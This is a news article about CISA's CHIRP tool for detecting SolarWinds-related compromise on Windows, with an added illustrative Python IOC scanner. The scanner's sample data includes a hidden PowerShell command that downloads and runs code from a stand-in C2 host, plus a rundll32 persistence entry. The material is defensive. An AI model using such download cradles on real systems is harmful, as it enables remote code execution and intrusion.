The US Cybersecurity and Infrastructure Security Agency (CISA) has released a tool that security teams can use to detect malicious activity associated with the SolarWinds compromise in on-premises enterprise systems.
The tool, called CISA Hunt and Incident Response Program (CHIRP), is written in Python. It runs on Windows hosts and searches them for indicators of compromise (IOCs) tied to the threat actor's activity against SolarWinds customers.
“Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment,” CISA explained.
CHIRP searches for IOCs associated with malicious activity related to alerts tracked by CISA as AA20-352A and AA21-008A in an on-premises enterprise environment.
The two alerts describe activity in which the threat actors used trojanized SolarWinds Orion products to gain initial access and then abused compromised applications and accounts in victims' Microsoft 365 (M365)/Azure environments.
CHIRP writes its findings as JSON so they can be forwarded for further analysis in a SIEM or similar tooling. CISA says organizations can use CHIRP to:
- Examine Windows Registry for evidence of intrusion;
- Examine Windows event logs for artifacts related to SolarWinds attacks;
- Query Windows network artifacts; and
- Apply YARA rules to detect malware and implants.
In addition, system administrators can use CHIRP to look for:
- The presence of TEARDROP and RAINDROP malware;
- Credential dumping and certificate pulls;
- System, network, and M365 enumeration;
- Certain persistence mechanisms identified as associated with this campaign; and
- Known observable indicators of lateral movement.
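To make the scanning model concrete, the following is an added example written for this article, not CHIRP's own code and not its output schema. It shows the shape of an IOC hunt like the one CHIRP performs: indicators are matched against exported Windows event log records, a registry export and a file on disk, and every hit is emitted as one JSON object per line for SIEM ingestion. All indicators, event records, registry entries and file bytes are constructed for the demo; none are real SolarWinds IOCs.

```python
"""Minimal IOC hunt in the spirit of CHIRP (illustrative, not CISA's code)."""
import hashlib
import json
import re
from dataclasses import asdict, dataclass
from typing import Any, Dict, Iterable, List

# Constructed sample "implant" file: a fake PE header, padding and a marker string.
SAMPLE_FILE = b"MZ\x90\x00" + b"\x00" * 32 + b"EXAMPLE_IMPLANT_MARKER" + b"\x00" * 16

# Constructed, hypothetical indicators. In a real hunt these come from the IOC feed;
# the hash is pinned to SAMPLE_FILE here only so the demo produces a hit.
INDICATORS: Dict[str, Any] = {
    "domains": ["c2.evil-example.test"],
    "sha256": [hashlib.sha256(SAMPLE_FILE).hexdigest()],
    "registry_keys": [r"HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Persist"],
    "process_event_ids": [4688],  # Security log: "A new process has been created"
    "file_strings": [b"EXAMPLE_IMPLANT_MARKER"],
}

# Constructed records shaped like a simplified Get-WinEvent export.
SAMPLE_EVENTS = [
    {"RecordId": 1001, "EventID": 4688, "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"RecordId": 1002, "EventID": 4688,
     "CommandLine": "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://c2.evil-example.test/beacon'))"},
    {"RecordId": 1003, "EventID": 4624, "CommandLine": ""},
]

# Constructed .reg export (reg.exe export format); value strings double their backslashes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\x\\OneDrive.exe /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Persist]
"Updater"="rundll32.exe C:\\ProgramData\\upd.dll,Start c2.evil-example.test"
"""


@dataclass
class Finding:
    source: str          # "eventlog", "registry" or "file"
    indicator_type: str  # "domain", "registry_key", "sha256" or "string"
    indicator: str
    location: str        # record id, registry path or file path
    context: str         # the matched value, truncated


def scan_events(records: Iterable[Dict[str, Any]], ioc: Dict[str, Any] = INDICATORS) -> List[Finding]:
    """Flag process-creation records whose command line references an IOC domain."""
    hits: List[Finding] = []
    for rec in records:
        if rec.get("EventID") not in ioc["process_event_ids"]:
            continue
        cmd = str(rec.get("CommandLine", ""))
        for dom in ioc["domains"]:
            if dom.lower() in cmd.lower():
                hits.append(Finding("eventlog", "domain", dom, f"RecordId={rec.get('RecordId')}", cmd[:200]))
    return hits


_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def scan_registry(reg_export: str, ioc: Dict[str, Any] = INDICATORS) -> List[Finding]:
    """Walk a .reg export: flag known persistence keys and values that embed an IOC domain."""
    hits: List[Finding] = []
    current = None
    for line in reg_export.splitlines():
        key = _KEY_RE.match(line)
        if key:
            current = key.group("key")
            if current in ioc["registry_keys"]:
                hits.append(Finding("registry", "registry_key", current, current, line))
            continue
        val = _VALUE_RE.match(line)
        if val and current:
            data = val.group("data")
            for dom in ioc["domains"]:
                if dom.lower() in data.lower():
                    hits.append(Finding("registry", "domain", dom, f"{current}\\{val.group('name')}", data[:200]))
    return hits


def scan_file(path: str, data: bytes, ioc: Dict[str, Any] = INDICATORS) -> List[Finding]:
    """Hash match plus a YARA-style byte-string search reporting every offset."""
    hits: List[Finding] = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in ioc["sha256"]:
        hits.append(Finding("file", "sha256", digest, path, f"size={len(data)}"))
    for pat in ioc["file_strings"]:
        off = data.find(pat)
        while off != -1:
            hits.append(Finding("file", "string", pat.decode("ascii", "replace"), path, f"offset={off}"))
            off = data.find(pat, off + 1)
    return hits


def to_jsonl(findings: Iterable[Finding]) -> str:
    """One JSON object per line, the form most SIEM collectors ingest directly."""
    return "\n".join(json.dumps(asdict(f), sort_keys=True) for f in findings)


def run_all() -> List[Finding]:
    """Run every scanner over the constructed inputs and return the combined findings."""
    findings = scan_events(SAMPLE_EVENTS)
    findings += scan_registry(SAMPLE_REG)
    findings += scan_file(r"C:\ProgramData\upd.dll", SAMPLE_FILE)
    return findings


if __name__ == "__main__":
    print(to_jsonl(run_all()))
```

On a live host the inputs would come from the raw sources (the .evtx files, the registry hives or `reg.exe export`, and a file-system walk) rather than from the inline samples; the matching and the JSON-lines output stay the same, which is what makes the results straightforward to ship to a SIEM.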
CHIRP can be used in addition to CISA’s PowerShell-based tool Sparrow that detects potentially compromised apps and accounts in Azure/Microsoft 365 environments.
The threat actor behind the SolarWinds attack is tracked under several vendor names: UNC2452 (FireEye), SolarStorm (Palo Alto Networks Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).
In a joint statement, the FBI, CISA, ODNI, and the NSA assessed that the APT actor behind the SolarWinds attack is likely Russian in origin and working on behalf of the Russian government.